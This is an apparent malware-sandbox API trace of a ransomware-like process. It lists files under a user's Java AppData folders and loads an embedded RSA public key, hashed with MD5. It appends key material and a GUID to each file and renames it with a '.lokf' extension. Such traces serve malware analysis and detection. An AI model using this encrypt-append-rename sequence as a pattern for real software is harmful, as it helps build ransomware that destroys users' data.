[0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86e30 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86e30 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.330] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.330] PathFindFileNameW (pszPath="") returned="" [0061.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.331] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.331] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0061.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0061.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.332] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=719) returned 1 [0061.332] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.334] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.334] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.336] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.337] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x2cf, lpOverlapped=0x0) returned 1 [0061.337] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.337] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.337] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.337] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b88b8) returned 1 [0061.337] CryptCreateHash (in: hProv=0x6b88b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.338] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.338] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.338] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.338] GetLastError () returned 0x0 [0061.338] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.338] CryptReleaseContext (hProv=0x6b88b8, dwFlags=0x0) returned 1 [0061.338] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.338] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.338] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.338] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.338] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.338] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.338] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.339] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.339] CloseHandle (hObject=0x5cc) returned 1 [0061.339] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.lokf")) returned 1 [0061.342] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0061.342] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0061.342] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0061.342] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.342] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.342] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.343] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.343] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.343] PathFindFileNameW (pszPath="") returned="" [0061.343] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.343] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.343] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0061.343] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0061.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.345] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=25340970) returned 1 [0061.345] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.348] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.348] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.350] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x25805, lpOverlapped=0x0) returned 1 [0061.352] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.352] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.352] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.352] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b88b8) returned 1 [0061.353] CryptCreateHash (in: hProv=0x6b88b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.353] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.353] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.353] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.353] GetLastError () returned 0x0 [0061.353] CryptDestroyHash 